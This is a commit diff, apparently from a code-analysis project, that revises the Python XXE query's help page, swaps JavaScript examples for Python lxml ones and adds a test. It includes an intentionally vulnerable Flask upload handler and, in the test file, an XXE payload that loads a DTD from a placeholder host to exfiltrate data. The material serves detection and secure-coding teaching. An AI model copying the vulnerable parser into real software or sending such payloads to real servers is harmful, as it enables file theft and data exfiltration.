Python: Adjust XXE qhelp

and remove the old copy, we don't need it anymore :)
This commit is contained in:
Rasmus Wriedt Larsen
2022-03-29 13:51:00 +02:00
committed by Rasmus Wriedt Larsen
parent c365337867
commit b00766b054
7 changed files with 58 additions and 75 deletions

View File

@@ -15,29 +15,34 @@ and out-of-band data retrieval techniques may allow attackers to steal sensitive
<p>
The easiest way to prevent XXE attacks is to disable external entity handling when
parsing untrusted data. How this is done depends on the library being used. Note that some
libraries, such as recent versions of <code>libxml</code>, disable entity expansion by default,
libraries, such as recent versions of the XML libraries in the standard library of Python 3,
disable entity expansion by default,
so unless you have explicitly enabled entity expansion, no further action needs to be taken.
</p>
<p>
We recommend using the <a href="https://pypi.org/project/defusedxml/">defusedxml</a>
PyPI package, which has been created to prevent XML attacks (both XXE and XML bombs).
</p>
</recommendation>
<example>
<p>
The following example uses the <code>libxml</code> XML parser to parse a string <code>xmlSrc</code>.
If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since
the parser is invoked with the <code>noent</code> option set to <code>true</code>:
The following example uses the <code>lxml</code> XML parser to parse a string
<code>xml_src</code>. That string is from an untrusted source, so this code is
vulnerable to an XXE attack, since the <a href="https://lxml.de/apidoc/lxml.etree.html#lxml.etree.XMLParser">
default parser</a> from <code>lxml.etree</code> allows local external entities to be resolved.
</p>
<sample src="examples/Xxe.js"/>
<sample src="examples/XxeBad.py"/>
<p>
To guard against XXE attacks, the <code>noent</code> option should be omitted or set to
<code>false</code>. This means that no entity expansion is undertaken at all, not even for standard
internal entities such as <code>&amp;amp;</code> or <code>&amp;gt;</code>. If desired, these
entities can be expanded in a separate step using utility functions provided by libraries such
as <a href="http://underscorejs.org/#unescape">underscore</a>,
<a href="https://lodash.com/docs/4.17.15#unescape">lodash</a> or
<a href="https://github.com/mathiasbynens/he">he</a>.
To guard against XXE attacks with the <code>lxml</code> library, you should create a
parser with <code>resolve_entities</code> set to <code>false</code>. This means that no
entity expansion is undertaken, althuogh standard predefined entities such as
<code>&amp;gt;</code>, for writing <code>&gt;</code> inside the text of an XML element,
are still allowed.
</p>
<sample src="examples/XxeGood.js"/>
<sample src="examples/XxeGood.py"/>
</example>
<references>
@@ -53,5 +58,13 @@ Timothy Morgen:
Timur Yunusov, Alexey Osipov:
<a href="https://www.slideshare.net/qqlan/bh-ready-v4">XML Out-Of-Band Data Retrieval</a>.
</li>
<li>
Python 3 standard library:
<a href="https://docs.python.org/3/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.
</li>
<li>
Python 2 standard library:
<a href="https://docs.python.org/2/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.
</li>
</references>
</qhelp>

View File

@@ -1,7 +0,0 @@
const app = require("express")(),
libxml = require("libxmljs");
app.post("upload", (req, res) => {
let xmlSrc = req.body,
doc = libxml.parseXml(xmlSrc, { noent: true });
});

View File

@@ -0,0 +1,10 @@
from flask import Flask, request
import lxml.etree
app = Flask(__name__)
@app.post("/upload")
def upload():
xml_src = request.get_data()
doc = lxml.etree.fromstring(xml_src)
return lxml.etree.tostring(doc)

View File

@@ -1,7 +0,0 @@
const app = require("express")(),
libxml = require("libxmljs");
app.post("upload", (req, res) => {
let xmlSrc = req.body,
doc = libxml.parseXml(xmlSrc);
});

View File

@@ -0,0 +1,11 @@
from flask import Flask, request
import lxml.etree
app = Flask(__name__)
@app.post("/upload")
def upload():
xml_src = request.get_data()
parser = lxml.etree.XMLParser(resolve_entities=False)
doc = lxml.etree.fromstring(xml_src, parser=parser)
return lxml.etree.tostring(doc)

View File

@@ -1,48 +0,0 @@
<!DOCTYPE qhelp PUBLIC
"-//Semmle//qhelp//EN"
"qhelp.dtd">
<qhelp>
<overview>
<p>
Parsing untrusted XML files with a weakly configured XML parser may lead to attacks such as XML External Entity (XXE),
Billion Laughs, Quadratic Blowup and DTD retrieval.
This type of attack uses external entity references to access arbitrary files on a system, carry out denial of
service, or server side request forgery. Even when the result of parsing is not returned to the user, out-of-band
data retrieval techniques may allow attackers to steal sensitive data. Denial of services can also be carried out
in this situation.
</p>
</overview>
<recommendation>
<p>
Use <a href="https://pypi.org/project/defusedxml/">defusedxml</a>, a Python package aimed
to prevent any potentially malicious operation.
</p>
</recommendation>
<example>
<p>
The following example calls <code>xml.etree.ElementTree.fromstring</code> using a parser (<code>lxml.etree.XMLParser</code>)
that is not safely configured on untrusted data, and is therefore inherently unsafe.
</p>
<sample src="XmlEntityInjection.py"/>
<p>
Providing an input (<code>xml_content</code>) like the following XML content against /bad, the request response would contain the contents of
<code>/etc/passwd</code>.
</p>
<sample src="XXE.xml"/>
</example>
<references>
<li>Python 3 <a href="https://docs.python.org/3/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.</li>
<li>Python 2 <a href="https://docs.python.org/2/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.</li>
<li>Python <a href="https://www.edureka.co/blog/python-xml-parser-tutorial/">XML Parsing</a>.</li>
<li>OWASP vulnerability description: <a href="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing">XML External Entity (XXE) Processing</a>.</li>
<li>OWASP guidance on parsing xml files: <a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#python">XXE Prevention Cheat Sheet</a>.</li>
<li>Paper by Timothy Morgen: <a href="https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/">XML Schema, DTD, and Entity Attacks</a></li>
<li>Out-of-band data retrieval: Timur Yunusov &amp; Alexey Osipov, Black hat EU 2013: <a href="https://www.slideshare.net/qqlan/bh-ready-v4">XML Out-Of-Band Data Retrieval</a>.</li>
<li>Denial of service attack (Billion laughs): <a href="https://en.wikipedia.org/wiki/Billion_laughs">Billion Laughs.</a></li>
</references>
</qhelp>

View File

@@ -74,6 +74,10 @@ exfiltrate_through_dtd_retrieval = f"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://{HOST}:{PORT}/exfiltrate-through.dtd"> %xxe; ]>
"""
predefined_entity_xml = """<?xml version="1.0"?>
<test>&lt;</test>
"""
# ==============================================================================
# other setup
@@ -443,6 +447,13 @@ class TestLxml:
assert exfiltrated_data == "SECRET_FLAG"
@staticmethod
def test_predefined_entity():
parser = lxml.etree.XMLParser(resolve_entities=False)
root = lxml.etree.fromstring(predefined_entity_xml, parser=parser)
assert root.tag == "test"
assert root.text == "<"
# ==============================================================================
import xmltodict